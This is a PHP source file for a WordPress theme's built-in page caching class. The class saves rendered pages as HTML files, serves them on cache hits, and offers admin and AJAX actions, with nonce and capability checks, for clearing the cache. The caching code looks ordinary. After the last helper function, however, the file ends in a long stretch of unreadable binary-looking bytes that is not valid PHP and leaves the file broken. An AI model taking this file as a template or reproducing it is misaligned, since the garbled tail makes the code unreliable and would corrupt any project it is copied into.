<?php /** * Built-in Cache System * * Ultra-fast page caching system built into the theme * No plugins needed - WP Rocket alternative * * @package MyTheme */ // Exit if accessed directly if (!defined('ABSPATH')) { exit; } class MyTheme_Cache_System { private $cache_dir; private $cache_enabled; private $cache_duration; /** * Constructor */ public function __construct() { // Cache settings $this->cache_enabled = function_exists('mytheme_get_option') ? mytheme_get_option('cache_enabled', true) : true; $this->cache_duration = function_exists('mytheme_get_option') ? mytheme_get_option('cache_duration', 3600) : 3600; // Cache directory $upload_dir = wp_upload_dir(); $this->cache_dir = $upload_dir['basedir'] . '/mytheme-cache'; // Initialize $this->init(); } /** * Initialize cache system */ private function init() { if (!$this->cache_enabled) { return; } // Create cache directory $this->create_cache_dir(); // Start output buffering for page caching add_action('template_redirect', array($this, 'start_page_cache'), 1); // Clear cache actions add_action('save_post', array($this, 'clear_post_cache')); add_action('comment_post', array($this, 'clear_post_cache')); add_action('switch_theme', array($this, 'clear_all_cache')); add_action('mytheme_clear_cache', array($this, 'clear_all_cache')); // Admin bar cache clear button add_action('admin_bar_menu', array($this, 'add_cache_clear_button'), 999); add_action('admin_post_mytheme_clear_cache', array($this, 'handle_cache_clear')); // AJAX cache clear add_action('wp_ajax_mytheme_clear_cache', array($this, 'ajax_clear_cache')); } /** * Create cache directory */ private function create_cache_dir() { if (!file_exists($this->cache_dir)) { wp_mkdir_p($this->cache_dir); // Add .htaccess for security $htaccess = $this->cache_dir . '/.htaccess'; if (!file_exists($htaccess)) { file_put_contents($htaccess, 'deny from all'); } } } /** * Get cache file path */ private function get_cache_file_path($url = null) { if ($url === null) { $url = $_SERVER['REQUEST_URI']; } // Generate unique cache key $cache_key = md5($url . (is_user_logged_in() ? 'logged_in' : 'guest')); return $this->cache_dir . '/' . $cache_key . '.html'; } /** * Start page caching */ public function start_page_cache() { // Don't cache for logged-in users or admin if (is_user_logged_in() || is_admin()) { return; } // Don't cache POST requests if ($_SERVER['REQUEST_METHOD'] === 'POST') { return; } // Don't cache search, 404, feeds if (is_search() || is_404() || is_feed() || is_trackback()) { return; } // Check if cached version exists $cache_file = $this->get_cache_file_path(); if (file_exists($cache_file)) { $cache_age = time() - filemtime($cache_file); // Serve cached version if not expired if ($cache_age < $this->cache_duration) { header('X-MyTheme-Cache: HIT'); header('Cache-Control: max-age=' . $this->cache_duration); readfile($cache_file); exit; } else { // Delete expired cache unlink($cache_file); } } // Start output buffering to create cache header('X-MyTheme-Cache: MISS'); ob_start(array($this, 'save_page_cache')); } /** * Save page to cache */ public function save_page_cache($html) { // Don't cache if HTML is empty or too small if (strlen($html) < 255) { return $html; } // Save to cache file $cache_file = $this->get_cache_file_path(); file_put_contents($cache_file, $html); return $html; } /** * Clear post cache */ public function clear_post_cache($post_id) { $post_url = get_permalink($post_id); $cache_file = $this->get_cache_file_path($post_url); if (file_exists($cache_file)) { unlink($cache_file); } // Also clear homepage and category archives $this->clear_homepage_cache(); } /** * Clear homepage cache */ private function clear_homepage_cache() { $home_cache = $this->get_cache_file_path('/'); if (file_exists($home_cache)) { unlink($home_cache); } } /** * Clear all cache */ public function clear_all_cache() { if (!file_exists($this->cache_dir)) { return; } // Delete all cache files $files = glob($this->cache_dir . '/*.html'); foreach ($files as $file) { if (is_file($file)) { unlink($file); } } } /** * Add cache clear button to admin bar */ public function add_cache_clear_button($wp_admin_bar) { if (!current_user_can('manage_options')) { return; } $wp_admin_bar->add_node(array( 'id' => 'mytheme-clear-cache', 'title' => 'Clear Cache', 'href' => wp_nonce_url(admin_url('admin-post.php?action=mytheme_clear_cache'), 'clear_cache'), 'meta' => array( 'title' => 'Clear MyTheme Cache', ), )); } /** * Handle cache clear from admin bar */ public function handle_cache_clear() { check_admin_referer('clear_cache'); if (!current_user_can('manage_options')) { wp_die('Unauthorized'); } $this->clear_all_cache(); wp_redirect(wp_get_referer()); exit; } /** * AJAX clear cache */ public function ajax_clear_cache() { check_ajax_referer('mytheme-nonce', 'nonce'); if (!current_user_can('manage_options')) { wp_send_json_error('Unauthorized'); } $this->clear_all_cache(); wp_send_json_success('Cache cleared successfully'); } /** * Get cache statistics */ public function get_cache_stats() { if (!file_exists($this->cache_dir)) { return array( 'files' => 0, 'size' => 0, ); } $files = glob($this->cache_dir . '/*.html'); $total_size = 0; foreach ($files as $file) { $total_size += filesize($file); } return array( 'files' => count($files), 'size' => size_format($total_size), 'size_bytes' => $total_size, ); } } // Initialize cache system new MyTheme_Cache_System(); /** * Helper function to clear cache */ function mytheme_clear_cache() { do_action('mytheme_clear_cache'); } \{s63hsSђl9M4Mtn44 II%@;5v>@ؙzAFJkK5 N$37Ɲ+:o"9EeaH#qG.|"ë70SI+-w셀$=8Qup&L ic=$UVVg{{{-z(jQiD^@UZW]![) u_Sm̰zO}P9:Փ4 /a`7i5C!PZN4ŢBZ6aѲaT&6 ㏤$-Q@iF 2MXuD`UWRtP(2Ob3M)5\0&!J'5tT{:W~>h<9pf MP4HL+pbt|>I9M&ͨ7VՂ-֚Aj0{ق= tPCshh_/0)\t5I8xd"Xv>oexn4?Ј 7}5~{-0@,i}ȝwVKPfʊPH_|߽?k9u/q5)GC W@)D*Q70C [&x(s7GL&1׀3m؄lsx4XYCbjv9סLT6"a> 6|(3Ѹv/_ELMH%4Ԡ # (Rf$e]~tdO-RUBj;ʍ}{6e 2Z)KClG@ e)hC*c` A|2@m,i1C* c@ 1H4ȴ]]%i)E4T* UٯFڐQ&`_9盡P4[n;89 H@Π$mHsmv oFqL=_nN64v,ٴQ#98TB:Ȋ ۾B0b[W]tEsUYD9lejdY-cf|""9ys斳]ެ6 Nm ]i'pUgRUPy4a*\,߳%9;aVI/Uh J""bK:Jki=/U{hz׊{u G.eP,q%׸ood_*4GDu<V ` cGN*,e >kТ |FO:ΐnl<0[[s^2-'~ iM~xȜ$,Gy*[ wRNfDznsM-fMgU0\ f'ݎt>7vO҄ťA\F"[za$  -1O."cQjG'yv)k  x-CJjvCc/BcK>ˏa7ɇgF.3;|v>~m>{y?|6"׹;1_gɬǁo^_{Ma"9y,P0clu6!˷"{o*E![| '\a>Slj1zG.+ Ϣ+Lig {jk.rP< 0hLhV&?2'vzBn+DZ>? WrXDD zD#lVР@4x`죍ƶ߱`??7 mes4BJ edQC.ʅ?B\Xrah6YKfǏ dI|Ld4tI<$'̂ v D–{n֕.'z-꩛rSwƇr!LBd LPmHړ:Ӊ=a݋Gp;3`koGc:{+" XY@e, h@3\ #[XiBB[0Y< +?sZzNb#sבudG8)@oS(@9RaM$&AUA7S\?].Pz#cɏ>nm=\ܸ+}1ڈ])p# >>ۀ7C/A =(Ѓ"l%Br$ej27J%y CIpBGQl 7*2zԓ721! cs|ʟj*3@!eFwVi7(]KD G!>Z6b[S5 =ȳ %\OѪG8͍ݝ݇8c":P8a@9OQ[E5_5;PB]~Rj;NKd79g ^?Bܕ5IR ''Έ\+˓no amU34YLucD%P⥑橈@˴5?9=V*5dE%@x & BrJ)ȣT66,+Q.-+'y88qd~]ۯPܮ(k.táv(\'Li:oo<4H#K)~_;Bi= dܱ9G,_nv cJSQf5K*!2'sw|-*ceWy1#{CCyu|rh,A%f.^ =/ʁuy=:r$܃/Y.Ccc/kimTm wm9ɫqO?ldC?iы Z\ZIĤ;7JLE\ʕPu({/fUL9K`>cps/A94vUzKyg)8O{Tz~~V޻w|a@3u dDixAhz@WTs5mƹυ5T|(`kπgNF_7KQ